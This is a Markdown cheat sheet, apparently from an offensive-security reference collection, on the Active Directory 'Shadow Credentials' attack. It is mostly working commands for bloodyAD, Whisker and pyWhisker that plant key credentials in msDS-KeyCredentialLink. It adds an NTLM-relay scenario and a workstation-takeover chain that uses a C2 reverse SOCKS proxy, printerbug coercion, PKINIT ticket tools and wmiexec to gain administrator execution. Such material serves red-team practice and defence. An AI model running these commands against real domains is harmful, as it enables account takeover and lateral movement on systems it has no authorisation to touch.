# Password - Shadow Credentials > Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. :warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists **Requirements**: * Domain Controller on (at least) Windows Server 2016 * Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured * PKINIT Kerberos authentication * An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object **Exploitation**: - Windows/Linux ```ps1 bloodyAD --host -u bloodyAdmin -p 'Password123!' -d bloody add shadowCredentials targetpc$ bloodyAD --host -u bloodyAdmin -p 'Password123!' -d bloody remove shadowCredentials targetpc$ --key ``` - From Windows, use [Whisker](https://github.com/eladshamir/Whisker): ```powershell # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. Whisker.exe list /target:computername$ # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] # Removes a key credential from the target object specified by a DeviceID GUID. Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b ``` - From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): ```bash # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" # Removes a key credential from the target object specified by a DeviceID GUID. python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" ``` ## Scenario ### Shadow Credential Relaying - Trigger an NTLM authentication from `DC01` (PetitPotam) - Relay it to `DC02` (ntlmrelayx) - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` ### Workstation Takeover with RBCD **Requirements**: * `Print Spooler` service running * `WebClient service` running **Exploitation**: * Using your C2, start a reverse socks on port 1080: `socks 1080` * Enable port forward from port 8081 to 81 on the compromised machine: `rportfwd 8081 81` * Start the relay: `proxychains python3 ntlmrelayx.py -t ldaps://dc.domain.lab --shadow-credentials --shadow-target target\$ --http-port 81` * Trigger a callback on webdav: `proxychains python3 printerbug.py domain.lab/user:password@target.domain.lab compromised@8081/file` * Use [PKINIT](https://github.com/dirkjanm/PKINITtools) to get a TGT for the machine account: `proxychains python3 gettgtpkinit.py domain.lab/target\$ target.ccache -cert-pfx -pfx-pass ` * Elevate your privileges by creating a service ticket impersonating a local admin: `proxychains python3 gets4uticket.py kerberos+ccache://domain.lab\\target\$:target.ccache@dc.domain.lab cifs/target.domain.lab@domain.lab administrator@domain.lab administrator_target.ccache -v` * Use your ticket: `export KRB5CCNAME=/path/to/administrator_target.ccache; proxychains python3 wmiexec.py -k -no-pass domain.lab/administrator@target.domain.lab` ## References * [Shadow Credentials: Workstation Takeover Edition - Matthew Creel - October 21, 2021](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) * [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)